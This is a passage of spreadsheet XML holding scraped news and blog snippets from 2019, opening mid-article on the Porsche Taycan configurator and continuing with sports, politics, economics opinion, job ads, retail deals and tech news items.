you’ll pay for Customers entering the configurator are given two options: Turbo or the pricier Turbo S. Regardless of which one a customer chooses, there are 10 colors from which to choose. Nine of those are gratis, meaning there is no extra fee. These “free” colors include white, black and six metallic colors, such as Carrera White, Jet Black, Volcano Grey, Dolomite Silver, Gentian Blue, Frozen Blue and Mamba Green. One color comes with a price: Carmine Red, pictured below, costs another $3,150. Carmine Red doesn’t fall into my subjective no-cost-unless it’s too cool category (don’t @ me). So, instead I opt for the $0 added cost Gentian Blue Metallic. Actually scratch that. I live in the desert. Let’s go with Carrera White Metallic. 3. Wheels I could spend as much as another $7,650 for 21-inch exclusive design wheels with carbon fiber aero blades. But not this time. Instead, I go with the one $0 option, 20-inch Turbo Aero wheels. (See, even the wheels are called Turbo). All-season tires are $0. But wait, what is this? For the bargain price of $1,290, I can paint the wheels to match the exterior color or pick from a few other custom options, including wheels are fully painted in Satin Aurum (a champagne, rose gold color), high-gloss black, jet black or satin platinum. I pick the exterior color and then I’m met with a terrible reality. To get the exterior color on the wheels I have to opt for the 21-inch Mission E or Taycan design wheels, which cost $3,570. I swallow hard, pick the Mission E design wheels and move on. For those who are counting, that base Taycan Turbo is now $158,370, a price that includes the charger, the design wheels and the painted wheel option. Here’s an example of the Carrera White Metallic with the Satin Aurum. And another example of the matching exterior wheels. 4. Interior colors Back in my frugal mindset, I scroll down to the configurator. There are three options for no additional cost — the all-black leather or two leather-free options, the race tex in black or graphite blue. I pick the leather-free option of graphite blue. There are six other options ranging between $570 and $3,070 of additional cost. I ignore these. 5. Seats I have sat in the Turbo S. The seats are nice and snug and well-made. In the configurator, the two options are standard and there is no extra cost. I can choose between power seats with 14 different functions and adaptive sport seats with 18-way operation. I go with the sporty option. 6. Dozens of options From here, it can get expensive. There are dozens of options for the exterior and performance. The first item is under the label “options.” There are two, both of which cost more money. The premium package of $4,340 includes the addition of a fixed panoramic glass roof (which I’m already paying for), park assist and “storage.” It’s unclear what storage means. The performance package is $5,400 and is focused on the way the vehicle can be manipulated. This is a sports car after all. This option includes rear-axle steering, the company’s Porsche Dynamic Chassis Control Sport and something called “electric sport sound.” I skip all of these and continue to scroll for the free options. 7. No badge, no problem I continue to scroll down and there are so many places to spend more money, including the window trim and the logo. But two items stand out. For no additional cost, I can remove the “Taycan Turbo” logo on the rear and add/remove the “electric” logo on the front doors in high gloss silver. I’m told Porsche has had a longstanding policy of letting customers remove the badge. And so, it seems, Porsche is continuing this with the Taycan. This seems cool, or maybe it’s that $0 figure next to it. I opt to remove the Turbo badge. 8. Performance There are a number of different packages, but only one is “free.” That’s the two-speed transmission, which comes standard. 9. Lights Sadly, there are no freebies here. But there is one fun item. One option, which costs $580, is the addition of LED lights in glacier blue. This seems cool, but nah. Nothing flashy. Let’s keep this sports car under budget. 10. Smoking package? I head into the interiors section, where I’m confronted with an array of choices to further customize the Turbo. I’m looking for the $0 options and come across the only one, a smoking package. This package includes a plug-in ashtray for the front cup holder. I pass. 11. Final $0 items There are dozens more options that could take the Taycan Turbo into the pricing stratosphere. But for this experiment, I’m looking for value. I spot one more item that can be added for no extra cost. Door-sill guards in black brushed aluminum. The remaining $0 items include charging cables. Final rundown: Porsche Taycan Turbo with the glass roof, in metallic Carrera White and the special Mission E design wheels and matching exterior color, plus the no cost add-ons — $159,720, which includes $1,350 of processing and delivery fee. Next time, we’ll shoot for how high we can get the price. Source: https://techcrunch.com/2019/09/05/porsche-taycan-configurator-the-9-details-that-stood-out/ The post Porsche Taycan configurator: The 11 details that stood out appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>US President Donald Trump has lashed out at musician John Legend and his “filthy mouthed wife” Chrissy Teigen for not playing a role in passing criminal justice reform following a TV special on the subject in which the star appeared.</t>
  </si>
  <si>
    <t>Jane Skilling</t>
  </si>
  <si>
    <t>TU Berlin is recruiting a research assistant for the CO2nsistent project. Core of the work will be development of TEA/LCA methodology and conducting CCUS case studies. Further details.</t>
  </si>
  <si>
    <t>B kamroq emotsional balladning orqa izi 93 zarba / soat Mp3 trek # 14-ni bu erda http://bit.ly/baks2016vol2-da yuklab oling Http://www.chusss.com […] The post B kamroq emotsional balladning orqa izi 93 zarba / soat appeared first on Shop Reviews.</t>
  </si>
  <si>
    <t>Being Askhole</t>
  </si>
  <si>
    <t>Those who missed it last time can get it now again. Enjoy :) This month, the Japan ticket will be free from September 5 to 9 for the last time. Head to the in-game store for your final chance to find the free Japan ticket. Once you have it, Japan will be unlocked for you forever.</t>
  </si>
  <si>
    <t>Carol H.</t>
  </si>
  <si>
    <t>Looking for a place where you are going to start a new life with your family? Well, in that case, Dubai might be a suitable option for you. Known as the largest and most populous city in the United Arab Emirates, be sure that you will experience a lot of different things and enjoy life in this city. Since we are talking about Dubai which has really grown fast in the last decades, you are going to find a lot of opportunities. Still, moving to Dubai with kids requires good preparation and organization. So, what should you know about this process? When you are moving to Dubai with kids, create a strategy The basic thing in your relocation to Dubai with kids is to plan every step in this process. This means that you have to define all the things on time. Keep in mind that you are moving to another state, so everything should go in a smooth way. One of the major things at the beginning of this process is to set the costs of your relocation. You need to define your moving budget and see how much everything is going to cost you. In this way, you will be able to set other things which you will need to have for your relocation. Make an inventory list of items which you are planning to move Another thing for your moving to Dubai with kids process is to define how many items you are planning to move. Also, you should write what is the type of items you are going to relocate. Keep in mind that this list will be really helpful during the entire process, especially when you need to stay organized on moving day. To have a clear image, you should separate the items in categories. This is not only going to be helpful for you, but it will be also helpful for movers when they are packing your belongings. Make a list of items which you are planning to move. Find a moving company There is no moving process without professional assistance. In other words, hiring a moving company is a crucial thing for you. Be sure that with movers, you will have everything under the control and you will be able to manage things. The trick is just to find affordable and reliable movers. You have to do good research on the internet and see which option is suitable for your budget. Do not hurry and take your time. Keep in mind that nowadays, you have a lot of moving companies. So, there are a lot of different options to choose from. What are the pros of living in Dubai? Once you have settled all the things for your relocation, we would like to present you with a list of the pros of living in Dubai: Lifestyle in Dubai is at a high level. – We have mentioned that Dubai has grown really fast. This also includes a lifestyle in this city. Even the cost of living in Dubai is expensive, still, you can experience something new and different. Good educational program. – One of the main reasons why moving to Dubai with kids is a good idea is because of this reason. With a good number of private and public schools, you will find a lot of different programs for your kids. Sports activities. – This might be surprising, but in Dubai, you have a lot of sports clubs and activities. Also, if you are looking for a personal trainer, you should contact Dubai Personal Trainers and you can find the one for you. Multicultural place.- Since a lot of people are coming to Dubai for work, it is a real multicultural place. A lot of job opportunities.- The last thing is that there are a lot of job opportunities in Dubai. With a stable economy which is growing really fast and companies which are located in Dubai, you will not have to worry about finding a job in this city. On the other hand, starting your own business in Dubai might be a good option. As you can see, these are some major facts about living in Dubai and why it is good. Be sure that once you relocate to this city, you are going to experience all these things! You can find a good educational program in Dubai. Your kids will have a lot of opportunities in Dubai Since we have mentioned the good things about Dubai, there is still one more. Keep in mind that moving to Dubai with kids is a score not only for you but also for your children. If they have that opportunity to grow in Dubai, they are simply going to love it. In every school, they organize a lot of activities which are important for children while they are growing up. We have mentioned sports activities in Dubai. Well, another good thing is that you can hire a personal trainer for your child. For example, while you are working and your children finish school, they can go and train with their personal trainer and wait for you until you finish. As you can see, Dubai has really become a city with different things to do and see. One of the activities your kids can have is to train with a personal trainer. Make a final check before you move to Dubai Having a final check is always an important thing before your moving day. You should go through every room and see if everything is prepared. Also, check your children’s belongings and see if everything is packed. When you finish checking, call your moving company and make a final deal with them. Once you finish it, you are ready for your move to Dubai. Enjoy your life in Dubai! Finally, when you have relocated to Dubai, take your time, adapt and experience this city in your own way! As you can see, moving to Dubai with kids is not a hard thing to do. You just have to plan and prepare everything properly. During the process, think about the benefits you will have when you relocate to Dubai and how your life will change. This can be a really good motivation for you to organize all the things in the right way and start living in Dubai as soon as it is possible! The post Moving to Dubai with kids appeared first on nycmoving.us.</t>
  </si>
  <si>
    <t>What is the PlayStation Plus line from October 2019? And when will the PS Plus range from October 2019 be announced? September 2019 was another solid month for Sony's subscription service, with Batman: Arkham Knight and Darksiders III as part of the lineup. The company will have to maintain this type of pace if it wants to appease consumer complaints, because the value of this offer has undoubtedly decreased since it abandoned the PS3 and PS Vita titles. We will share all rumors and speculations regarding the PS + range of October 2019. For a recap, check out our full list of all free PS Plus games in 2019. When will the free PS Plus games of October 2019 be announced? This will be the last Wednesday of the month when we will learn about the PlayStation Plus free games from October 2019, which happen to be September 25th on this occasion. When will the free PlayStation Plus games from October 2019 be available for download? As always, you will be able to download free PS Plus games from October 2019 on the first Tuesday of the month, October 1st of this year. What are the free PS Plus games of October 2019? Sony leaks on PlayStation Plus have been very limited this year, which means that PS Plus games from October 2019 are kept secret. We still think that Shenmue I &amp; II would be perfect before the imminent release of Shenmue III, but as SEGA is not involved in the sequel, it does not have much interest in yielding its predecessors. One of the Watch Dogs titles would be well before Watch Dogs Legion, or how about The Last of Us Remastered to Celebrate the Day of the Epidemic? What free PlayStation Plus games from October 2019 do you want? PS Plus has been much better in recent months, but does it offer the kind of value you expect? As always, share your comments in the comments section and let us know which free PlayStation Plus games you want in October 2019. Which free PS Plus games for October 2019 are you hoping for? Do you think it's time to play a bonus game? As always, let us know in the comments section below. .</t>
  </si>
  <si>
    <t>Nichola Curran, Director of Evolve Business Management Services explains how to overcome the 4 common challenges faced by health &amp; fitness business owners. source The post 4 Common Challenges Faced by Health &amp; Fitness Business Owners appeared first on Health Figure Store.</t>
  </si>
  <si>
    <t>Frontier Centre for Public Policy</t>
  </si>
  <si>
    <t>Left to their own devices, politicos every now and then come up with a theory that allows them to promise free lunches. Modern monetary theory (MMT) is all the rage in the United States and Canada among starry-eyed social engineers who see no limits to their intervention. Rather than arising from academic inquiry, debates concerning MMT are on the rise because socialist politicians such as Bernie Sanders and Alexandria Ocasio-Cortez have championed it to fund their pet projects. Proponents of MMT want policy-makers and voters to believe governments shouldn’t worry about deficits and debt as long as they’re able to print their own currency. Against all logic and historical evidence, they claim that monetary expansion doesn’t lead to inflation. A University of Chicago survey found zero leading economists willing to support MMT or to endorse the argument that countries “should not worry about government deficits because they can always create money to finance their debt.” Even Larry Summers, former president of Harvard University and treasury secretary under U.S. president Bill Clinton – a man hardly known for his free-market sensibilities – labelled it the “voodoo economics of our time.” Summers has warned that the embrace of MMT is a recipe for disaster. Kenneth Rogoff, a Harvard University professor and former IMF chief economist, called it the “modern monetary disaster.” Even Paul Krugman, the famed Keynesian economist and deficit dove, sees MMT as a descent too far into wishful-thinking territory. The Nobel Prize winner says that MMT arguments are both messianic and wrong. The world has witnessed a tsunami of easy money and credit over the past decade with the U.S. Federal Reserve’s quantitative easing rounds and their spillover effects. That didn’t bring about consumer price inflation because of a historic recession. However, MMTers believe fiscal and monetary expansion can be used in normal times to pay for trillions of dollars worth of new programs without accounting for deficits and national debts. It’s the old promise of a free lunch. Programs such as the Green New Deal – which aims to make “100 per cent of the U.S. power capacity clean and renewable” – have an unbearable cost for taxpayers and can only work through fictional and easy-money solutions such as MMT. The Green New Deal could cost up to US$93 trillion, which would be impossible to fund with explicit tax revenue. Thus, like in a fairy tale, MMT advocates argue the government should have a magic wand to conjure up money out of thin air. The harsh reality is that MMT, if applied, will lead to inflation because it massively increases the money supply. This dilution of purchasing power will also impact the exchange rate, devaluing the national currency relative to foreign ones. The latter in turn leads to more expensive imports, which also contribute to higher inflation. What proponents of MMT fail to mention is that society at large always ends up paying for government largesse, either through higher taxes or higher inflation. Latin-American countries offer cautionary tales about similar monetary experiments. The results have been disastrous: huge spending comes with huge costs, a fact exemplified by contemporary Argentina and Venezuela. Limited fiscal and monetary expansion might be acceptable during crises when unemployment is high and output is low. In the United States, however, the economy is growing faster than expected and unemployment is below four per cent. A boost in federal spending would neither stimulate nor stabilize gross domestic product. It would only divert labour and capital to the government’s hand-picked winners, as Steve Ambler from the C.D. Howe Institute points out. That’s exactly what MMT proponents want and is why its most vocal supporters endorse the Green New Deal, Medicare for All in the U.S. and other programs that require massive fiscal redistribution. MMT is not only bad macroeconomics and a monetary scam; it widens the door to cronyism and corruption. Every time the government funds new programs, it becomes more vulnerable to capture by special interests. Benefiting big corporations might not be the intention of Green New Deal supporters, but that’s exactly what will happen. Large firms from Wall Street are the ones with pockets deep enough to fund the best lobbyists who can get them a large piece of the new pie. Small businesses, on the other hand, will have to compete for the scraps. The MMT mania has already crossed over the border to Canada. A comprehensive website touts the theory as an all-purpose justification for every conceivable progressive policy under the sun. With MMT, the advocates claim, it would be possible for Canada to invest more in education, research, public services and job creation – as if throwing money at problems were enough to solve them. The Canadian economy would run at “near full capacity without triggering much additional inflation,” says Keith Newman for the Progressive Economics Forum. Any promise of outsized benefits that don’t incur costs should be regarded with great skepticism. MMT is bad policy and economists know it. It’s snake charming from social engineers who dream of dominion over an uninformed public. Fergus Hodgson is a research associate with the Frontier Centre for Public Policy. Mauricio Bento contributed to this article. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post There’s no free lunch when it comes to government spending appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Yeah, no, children can’t be “willing.” Via Fox News: Famed Massachusetts Institute of Technology (MIT) computer scientist Richard Stallman is under fire after a leaked email thread showed him defending an associate of the late convicted sex offender Jeffrey Epstein, claiming that his alleged victims were “entirely willing.” In the email thread, leaked by MIT […]</t>
  </si>
  <si>
    <t>Early in the evening, NC-3 was called: NBC is calling Greg Murphy (R) the winner in the NC-3 special election — Steve Kornacki (@SteveKornacki) September 11, 2019 But it took a while to get to the other race in NC-9. Now Decision Desk is calling it for the GOP, and Dan Bishop, the Trump-endorsed candidate. […]</t>
  </si>
  <si>
    <t>Anthony Colangelo</t>
  </si>
  <si>
    <t>Mid-year recruit Marlion Pickett gathered 20 disposals, laid nine tackles and kicked a goal in Richmond's thrilling VFL grand final victory on Sunday.</t>
  </si>
  <si>
    <t>Sam Phillips</t>
  </si>
  <si>
    <t>The ARLC chair weighed in on the possibility of a Sydney NRL club relocating after the topic was put back on the agenda this weekend.</t>
  </si>
  <si>
    <t>Tennis legends are unsure what will happen to the Davis Cup, which is steeped in 120 years of history and prestige, with the introduction of the ATP Cup.</t>
  </si>
  <si>
    <t>It's not every day that you see a game based on the idea of a gay pride parade. Pride Run is exactly that – it's a hybrid of real-time rhythmic and tactical tactics games that inspire you to stage a LGBTQ + parade – and protect it from enemies around the world. Pride Run was developed by the Italian developer Studio IV, who claims that the game has something to offer players of all levels. At the beginning, there is a simple timing game, which you do to keep your parade moving. But if you choose the 'Play Hard' mode, you will also have to deal with a tactic and a strategy in real time, according to the developers. Online retailer Green Man Gaming is working as a publisher for Pride Run. It donates 10% of the proceeds from Pride Run's sale to Kaleidoscope Trust, a UK-based charity dedicated to advocating for the rights of LGBTQ + people around the world. "It was great to have a glimpse of Pride Run during our first encounter with Green Man Gaming and it's a really fun game we're looking forward to playing," said Phyll Opoku-Gyimah, Executive Director of Kaleidoscope Trust . Here is the trailer: The soundtrack, it must be made clear, is absolutely bumpy. The game includes parades in Istanbul, Berlin, Moscow, Stockholm, San Francisco and others, and developers say it's inspired by Pride parades and parades held around the world for 50 years. The release date of Pride Run is 11 October. This date is recognized in the United States as National Development Day. For now, you can create a wish list of Pride Run on Steam. INFO Buy now</t>
  </si>
  <si>
    <t>Actor Alex Wolff has also been cast in the upcoming film. See full article at Film-news.co.uk » The post Nicolas Cage to play truffle hunter in Pig movie appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Charles Leclerc just held off Lewis Hamilton to win the Belgian Grand Prix from pole position on Sunday, securing the first victory of his Formula One career and ending Ferrari’s long wait for a win.</t>
  </si>
  <si>
    <t>Bayern Munich will reignite Leroy Sane £145m transfer pursuit in January despite Man City star’s serious knee injury – The Sun Original Source BAYERN MUNICH are set to renew their interest in Leroy Sane in January – despite his serious knee injury. But Manchester City will be in no mood to let the German winger go cheaply in the New Year – and still hope he will commit to a new deal at the Etihad. 1 Manchester City winger Leroy Sane is currently on the sidelines with a serious knee injuryCredit: PA:Press Association Sane is likely to be sidelined until the spring after suffering a cruciate knee problem in the Community Shield against Liverpool in early August. That forced Bayern to look elsewhere to bolster their squad in the short-term – signing Philippe Coutinho and winger Ivan Perisic on loan. But a swoop to bring Sane to the Allianz Arena on a permanent basis remains very much on the radar for the German champions. They will hope City drop their £145 million price tag in light of his injury – although the feeling at the Etihad is their stance remains unchanged. More than a year of talks over a new deal failed to reach a conclusion – but City have not yet given up hope. The Premier League champions reportedly knocked back an offer for Sane by Bayern in the region of £70million in the summer. And last month it was claimed that the Bavarian outfit are willing to make the player their highest earner on a whopping £400,000-a-week salary. Boss Pep Guardiola has already admitted that City are struggling to keep hold of Sane, as he stated that he is free to leave he wishes. He said: “He has to decide. If he wants and there is an agreement, then it’s good. “But if he wants to leave, he can do it. We will be sad – hopefully he stays.” Man City manager Pep Guardiola remains coy about Leroy Sane’s future with the club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Bayern Munich will reignite Leroy Sane £145m transfer pursuit in January despite Man City star’s serious knee injury – The Sun appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>ameebaro</t>
  </si>
  <si>
    <t>Womens Blue Denim Jacket has been reduced to $10. Was $59.99. Plus delivery costs (or free delivery over $80). Or free Click &amp; Collect in-store. Afterpay is also available.</t>
  </si>
  <si>
    <t>systmworks</t>
  </si>
  <si>
    <t>This popular 2019 model, 8-series TV has dropped below $1500 again. Not the lowest price ever, but looks to be the best price currently available, and lower than some recent sales prices. Currently listed for ~$1795 at JB HiFi, Harvey Norman, Myer. Use PSPRUNG code https://www.ozbargain.com.au/node/482815 at checkout. For those not familar with VideoPro, they are a Home Theatre focused retailer, have several retail stores in QLD, and can supply to most of Australia. https://www.videopro.com.au/t-store-locator-contact.aspx Info from Hisense website: https://hisense.com.au/product/65-series-8-65r8/ OVERVIEW With its sleek frame and modernist looks, the Hisense Series 8 TV is perfect for style conscious homes. But it’s not all about good looks. This is a TV that offers both style and substance. With Dolby Vision HDR, Quantum Dot Technology, and in-built Voice Remote, the Hisense Series 8 TV is fit for the modern world. Incredible picture contrast and colour depth, combined with a 200 Smooth Motion Rate panel, offers enhanced clarity in fast-moving images, making for a beautiful home entertainment experience, truly befitting of its good looks. VIDAA U3.0 AI VIDAA U3.0 AI offers enhanced connectivity, faster boot times and an even smarter user interface that can be fully customised. Let your TV serve up streaming content recommendations straight from the home screen. Now voice control ready, how good! DOLBY VISION HDR Dolby Vision HDR technology achieves an at home cinema experience by optimising every second of what you’re watching, adjusting brightness, colour and contrast automatically expanding the colour palette and contrast range, and uses dynamic metadata to automatically optimize what you’re watching — frame by frame. WIDE COLOUR GAMUT ULED TVs deliver over a billion colours for a more natural viewing experience in stunning 10bit. With all new Hi-View Engine, ULED TVs achieve 100% colour gamut measured to BT.709 standard. This means when receiving even standard signals, ULED TVs can still display true-to-life picture with authentic and vivid colours. ULTRA LOCAL DIMMING Ultra Local Dimming applies different contrast improvements on different regions of the panel simultaneously. This offers better contrast performance in both detail areas and across the TV panel as a whole. QUANTUM DOT COLOUR With Quantum Dot technology*, experience the brilliant blues, radiant reds, and glorious greens in stunning 10bit. Displaying over 1 billion colours with pin-point precision, your Premium ULED TV will look as crisp and beautiful as the world around you. *Available on P8 and P9 models only. DOLBY ATMOS Dolby Atmos transports you into the story with moving audio that flows all around you with breathtaking realism. Sound moves around you in three-dimensional space, so you feel like you’re inside the action. Experience how Dolby Atmos transports you from the ordinary into the extraordinary. WARRANTY 100% of our product range is genuine, local stock and comes with full warranty and support from the Australian manufacturers/distributors - no grey imports! This warranty is typically 36 months however; please feel free to ask one of our friendly sales staff for more information.</t>
  </si>
  <si>
    <t>Looking for a contractor. Office Manager Please send your resumes at huzaifa7653@gmail.com The contractor will look after all day to day operations of the training and consulting division of the company. Ensure smooth operation of multiple IT testing centers. Scheduling short term courses/classes, following up with the students, coordinating with the teachers, managing the advertisement .. Read more</t>
  </si>
  <si>
    <t>Construction Company looking to Contract crewmembers for projects with in GTA. The candidate should have strong knowledge in general contracting and renovation : Basement, Bathroom, Kitchen, offices and complete home. Team will be selected based on following: • Skills in finishing and installation works • Carry out day to day activities • Experience in pervious .. Read more</t>
  </si>
  <si>
    <t>Are you a skilled and hard working individual interested in working in a team environment? Do you have experience with hand tools or construction? Do you want to take advantage of optional overtime hours?Apply today for an immediate temporary position as a Warehouse Worker with a highly reputable company on site in Portage La Prairie! .. Read more</t>
  </si>
  <si>
    <t>Matt Bungard</t>
  </si>
  <si>
    <t>Just a few years ago, Tiana Penitani was looking forward to playing at the Tokyo Olympics. But life took a different turn.</t>
  </si>
  <si>
    <t>markcranston</t>
  </si>
  <si>
    <t>Found by Eddie McLean at Glenboig. Glenboig KK GD 228 Glenboig Union Fireclay Company, Glenboig, Lanarkshire. Alternative brickworks include: Glenboig Star Fireclay Works, Glenboig, Lanarkshire. Glenboig Fireclay Works, (Old Works) Glenboig, Lanarkshire . . . . This large special was found next to a completely different shaped special which was stamped ‘Glenboig MM GD 228‘....</t>
  </si>
  <si>
    <t>Build to rent developments are gaining traction in Brisbane as institutional investors embrace a global trend.</t>
  </si>
  <si>
    <t>We all know that today’s Republican Party is a wholly owned subsidiary of powerful corporate interests — the fossil fuel industry, the Koch brothers network, and of course the gun industry. Now obviously, none of these corporate interests donate out of the goodness of their “hearts” – if they were “people my friends” and had hearts, that is. Instead, what they want in exchange is for the recipients of their largess do their bidding, whether by voting their way or by blocking legislation that the corporate interests don’t like. Here in Virginia, we saw a classic example of that back in early July, when “The Virginia Legislature Held a Special Session to Pass Gun Control. Then State Republicans Pulled a Mitch McConnell.” …the session ended after just 90 minutes, with the state’s GOP-controlled general assembly adjourning without voting on any of the dozens of gun control bills introduced by members of both parties. The Washington Post reported that the state Senate and House of Delegates voted to adjourn the session until November 18—right after the state’s midterm elections. Perhaps as a reward, the National Rifle Association (NRA) has been busy helping out their Virginia Republican pals, including this past week, when they donated nearly $10,000 to their favorite Republican candidates. That money included: $1,292 to pay canvassers in Del. Roxann Robinson’s, Speaker Kirk Cox’s, Sen. Bill DeSteph’s, Del. Nick Freitas’, and Del. Barry Knight’s districts. $1,034 to pay phone bankers in Del. Roxann Robinson’s and Del. Rob Bloxom’s districts. $308 to pay canvassers in Del. Roxann Robinson’s, Speaker Kirk Cox’s, Sen. Bill DeSteph’s, Del. Nick Freitas’, and Del. Barry Knight’s districts. $222 to pay canvassers in Del. Roxann Robinson’s, Speaker Kirk Cox’s, and Del. Nick Freitas’ districts $6,772 on door hangers to distribute in Del. Roxann Robinson’s, Kirk Cox’s, Bill DeSteph’s, Sen. Bryce Reeves’, Paul Milde’s, Del. Glenn Davis’, Del. Rob Bloxom’s, Del. Chris Stolle’s, and Del. Barry Knight’s districts. spent $6,772 on door hangers to distribute in Roxann Robinson’s, Kirk Cox’s, Bill DeSteph’s, Sen. Bryce Reeves’, Paul Milde’s, Del. Glenn Davis’, Del. Rob Bloxom’s, Del. Chris Stolle’s, and Del. Barry Knight’s districts. Shweet, eh? Unless, of course, you want a Virginia General Assembly that actually does something to rein in the scourge of gun violence, that is. Just a reminder of why it matters that you vote on November 5 – for Democrats, up and down the ballot.</t>
  </si>
  <si>
    <t>Toronto Blue Jays (61-91, fourth in the AL East) vs. Baltimore Orioles (49-103, fifth in the AL East)</t>
  </si>
  <si>
    <t>The Moir Stakes field is set to scorch the turf, with some of the fastest horses in training set to line up for a Valley tear up on Grand Final eve.</t>
  </si>
  <si>
    <t>Android Authority The post These new Misfit hybrid watches are hot appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>Scout Staff</t>
  </si>
  <si>
    <t>Who’s Playing UTEP (home) vs. Nevada (away) Current Records: UTEP 1-1-0; Nevada 2-1-0 What to Know Nevada will be playing 60 minutes on Saturday, but they’re expected to have things wrapped up well before that. They will head out on the road to face off against UTEP at 8 p.m. ET at Sun Bowl. Nevada doesn’t have the home-field advantage, but they do enjoy a 14-point advantage in the spread. Last week, the Wolf Pack turned the game against Weber State into a track meet and took the gold after outgaining them 454 yards to 131. The Wolf Pack managed a 19-13 victory over Weber State. Nevada’s RB Jaxson Kincaide was one of the most active players for the squad as he rushed for 75 yards and one touchdown on 11 carries. Kincaide didn’t help his team much against</t>
  </si>
  <si>
    <t>Staff</t>
  </si>
  <si>
    <t>TORONTO — Of the eight starting running backs this week, three stand above the rest as Johnny Augustine, Ka’Deem Carey and William Stanback are the most popular players in TSN CFL Fantasy. Riders receiving duo Shaq Evans and Naaman Roosevelt are also getting plenty of play, while Fantasy players aren’t shying away from the gaudy salaries of Reggie Begelton and Derel Walker. » Set your lineup in TSN CFL Fantasy presented by LeoVegas today! Finally, in a bit of a plot twist, Argos quarterback McLeod Bethel-Thompson is the most chosen quarterback as of Friday morning, but Cody Fajardo and Vernon Adams Jr. are not far behind. As Week 13 rolls around, it’s time to set your lineups. CFL Fantasy Podcast hosts Pat Steinberg, Jeff Krever and Hannah Nordman make their picks below. RELATED » Fantasy Weekly: Lineup tools for Week 13 » Headlines: The latest CFL Fantasy news » DailyRoto: Projections for Week 13 Think you can do better? Play along and compete with them and the rest of the world in the CFL Fantasy Podcast league, and remember to tune in every week for the latest news, debate, lineup locks and bargain buys. TSN CFL Fantasy is back for 2019! Sign up for your chance to win a Grey Cup package valued at $5,000! (Click here for contest terms and conditions). CFL Fantasy Podcast Week 13 lineups STEINBERG NORDMAN KREVER QB Jonathon Jennings ($5,230) Vernon Adams Jr. ($10,066) Vernon Adams Jr. ($10,066) RB Ka’Deem Carey ($5,385) Ka’Deem Carey ($5,385) Ka’Deem Carey ($5,385) RB Johnny Augustine ($4,500) Johnny Augustine ($4,500) Brandon Rutley ($4,464) WR Derel Walker ($9,029) Derel Walker ($9,029) DaVaris Daniels ($8,430) WR Eugene Lewis ($7,065) Quan Bray ($4,162) Rodney Smith ($4,254) FLEX Tevaun Smith ($3,374) Kenny Lawler ($2,500) Quan Bray ($4,162) DEF Calgary Stampeders ($5,312) Montreal Alouettes ($3,665) Toronto Argonauts ($3,200) Fan Poll Who will have more points in Week 13? Pat Steinberg Vote Hannah Nordman Vote Jeff Krever Vote Submit View Poll Results</t>
  </si>
  <si>
    <t>Jon Pierik</t>
  </si>
  <si>
    <t>The Tigers have stormed into their second grand final within three years, leaving the Cats devastated. Here was our live coverage as the two teams clashed in an enthralling preliminary final.</t>
  </si>
  <si>
    <t>The DUP MP said he should not have “accused either Mr McBride or the News Letter of lying”. Read more? Click here</t>
  </si>
  <si>
    <t>Alexandre Lacazette's absence leaves Unai Emery with a number of different attacking options to mull over ahead of trip to Old Trafford The post Arsenal team news: The expected 4-3-1-2 line-up to face Manchester United appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>brucetopher posted a photo: September 15, 2019 Nauset Light Beach Cape Cod National Seashore Eastham,</t>
  </si>
  <si>
    <t>Link: https://www.nhc.noaa.gov/text/refresh/MIATCPAT4+shtml/122045.shtml ...A TROPICAL CYCLONE IS EXPECTED TO FORM NEAR THE NORTHWESTERN BAHAMAS...</t>
  </si>
  <si>
    <t>GeekSG</t>
  </si>
  <si>
    <t>Black and white collar option available Tryone Gooseneck iPhone Mount/ iPad Mount/ Cellphone Mount/ Tablets Mount/ Lazy Mount/ iPhone Stand Holder/ iPad Stand Holder/ Tablets Stand Holder Features: *Max Weight: 1.2lb(about 550g). *30 inches(about 76cm) length heavy duty and flexible gooseneck. Very suitable length, neither too long nor too short. *Bolt clamp with protective pad. Fit for 3 inches(75mm) thickness desk top/ bed headboard/ wall cabinet. The protective pad will prevent the furniture from scratching. *360 degree rotating bracket with antiskid pad. Suitable for Apple iPhone iPad or other Android Devices from 4 to 10.6 inches with the antiskid pad. *Premium material. The durable and flexible gooseneck is made of the Aluminium-Magnesium Alloy while the stable bolt clamp and the firm bracket are made of the Engineering-Plastics. Quality Guarantee: If there is any quality problem of the product itself, do not hesitate to contact us immediately. We will solve the issue to your satisfaction.</t>
  </si>
  <si>
    <t>Yan Zhuang</t>
  </si>
  <si>
    <t>Crown Casino workers are threatening to walk off the job during the Spring Racing Carnival to demand secure work and better pay.</t>
  </si>
  <si>
    <t>As of today, the way we spend Qantas points has changed. Here’s what you should know about the biggest revamp in the history of the frequent flyer program.</t>
  </si>
  <si>
    <t>Highfields Gracelands</t>
  </si>
  <si>
    <t>German Marathi Dictionary – travel dictionary to translate German to Marathi. Click on the list to show German or Marathi synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading German Marathi Dictionary →</t>
  </si>
  <si>
    <t>Two of Supercars' biggest names face bans ahead of the showcase Bathurst 1000 after taking aim at race officials.</t>
  </si>
  <si>
    <t>Source: http://www.techmeme.com/190910/p26#a190910p26 Uber says it has laid off 170 people from its product team and 265 people from its engineering team (Megan Rose Dickey/TechCrunch) Megan Rose Dickey / TechCrunch: Uber says it has laid off 170 people from its product team and 265 people from its engineering team — Uber has laid off 435 employees across its product and engineering teams, the company announced today. Combined, the layoffs represent about 8% of the organizations … Source: http://www.techmeme.com/190910/p26#a190910p26 The post Uber says it has laid off 170 people from its product team and 265 people from its engineering team (Megan Rose Dickey/TechCrunch) appeared first on CYBERDEN.</t>
  </si>
  <si>
